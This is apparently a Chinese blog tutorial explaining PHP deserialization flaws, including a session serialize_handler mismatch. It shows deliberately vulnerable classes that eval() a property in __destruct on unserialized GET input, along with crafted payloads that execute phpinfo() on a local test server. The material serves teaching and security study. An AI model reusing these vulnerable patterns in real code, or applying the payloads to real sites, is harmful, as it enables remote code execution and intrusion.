PHP反序列化漏洞

简介: 【序列化简单利用】      serialize() 序列化:使用函数serialize()可将实例序列化为字符串  unserialize() 反序列化:使用函数unserialize()可将序列化的字符串还原 代码示例: 漏洞利用: 构造漏洞利用的代码,保存为test.

【序列化简单利用】 

    serialize() 序列化:使用函数serialize()可将实例序列化为字符串
  unserialize() 反序列化:使用函数unserialize()可将序列化的字符串还原

代码示例:

<?php
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);
    }
}
unserialize($_GET['code']);
?>

漏洞利用:

构造漏洞利用的代码,保存为test.php,获取序列化值为  O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}

<?php
class Example {
    var $var = 'phpinfo();';
    function __destruct() {
        eval($this->var);
    }
}
$a=new Example();
echo serialize($a);
?>

提交?code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}  即可执行phpinfo()

【PHP SESSION反序列化】

   主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);

       ini_set(‘session.serialize_handler’, ‘php’);

       两者处理session的方式不同

<?php
ini_set('session.serialize_handler','php_serialize');
//ini_set('session.serialize_handler','php'); session_start(); $_SESSION[
"test"]=$_GET["a"]; ?>
//提交?a=1111
输出结果:
php_serialize: a:1:{s:4:"test";s:4:"1111";}
php: test|s:4:"1111";

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法
代码示例:
新建test1.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>
新建test2.php
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["test"]=$_GET["a"];
?>

漏洞利用:

构造利用代码

<?php
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
$a=new test();
echo serialize($a);

?>

获取反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

步骤一:提交test2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

    传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

步骤二:然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()

    此时访问test1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value,然后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。

 

 

参考文章:

PHP反序列化漏洞  http://wyb0.com/posts/php-deserialization-vulnerabilities/

PHP反序列化 代码执行 https://www.cnblogs.com/yinqin/articles/4962837.html

PHP中SESSION反序列化机制  https://blog.spoock.com/2016/10/16/php-serialize-problem/

目录
相关文章
|
4月前
|
SQL 安全 API
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
105 4
|
7月前
|
存储 监控 安全
Pikachu PHP 反序列化通关解析
Pikachu PHP 反序列化通关解析
|
6月前
|
安全 前端开发 测试技术
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
|
7月前
|
安全 PHP
零基础学习挖掘PHP网站漏洞
本套课程,分为三个阶段:第一阶段:基础篇 学习PHP开发的基础知识,对PHP常见的漏洞进行分析,第二阶段:进阶篇 实战PHP漏洞靶场,了解市面上的PHP主流网站开发技术,并对市面上的主流框架进行漏洞分析,第三阶段:高级篇 实战演示PHP代码审计技术,并能手动开发PHP框架,了解大型网站的核心技术!
62 2
|
7月前
|
安全 PHP 数据库
【PHP开发专栏】PHP文件包含漏洞与防范
【4月更文挑战第30天】本文探讨了PHP文件包含漏洞,该漏洞让攻击者能执行恶意代码或访问敏感信息。文章分为三部分:原理、影响和防范。文件包含函数(如`include`和`require`)在攻击者控制文件名时可能导致漏洞。影响包括执行恶意代码、泄露敏感信息和影响服务器性能。防范措施包括验证文件名安全性、使用安全包含函数、设置安全包含路径和参数,以及定期更新和维护代码及库。开发者应重视此问题,采取相应措施保障应用安全。
142 0
|
7月前
|
安全 PHP
PHP反序列化---字符串逃逸(增加/减少)
PHP反序列化---字符串逃逸(增加/减少)
|
7月前
|
PHP
PHP反序列化--引用
PHP反序列化--引用
|
7月前
|
PHP
PHP反序列化--pop链
PHP反序列化--pop链
|
7月前
|
安全 PHP
PHP反序列化--_wakeup()绕过
PHP反序列化--_wakeup()绕过
|
7月前
|
网络安全 PHP 数据安全/隐私保护
[网络安全/CTF] 记一次PHP序列化反序列化解题详析
[网络安全/CTF] 记一次PHP序列化反序列化解题详析
110 5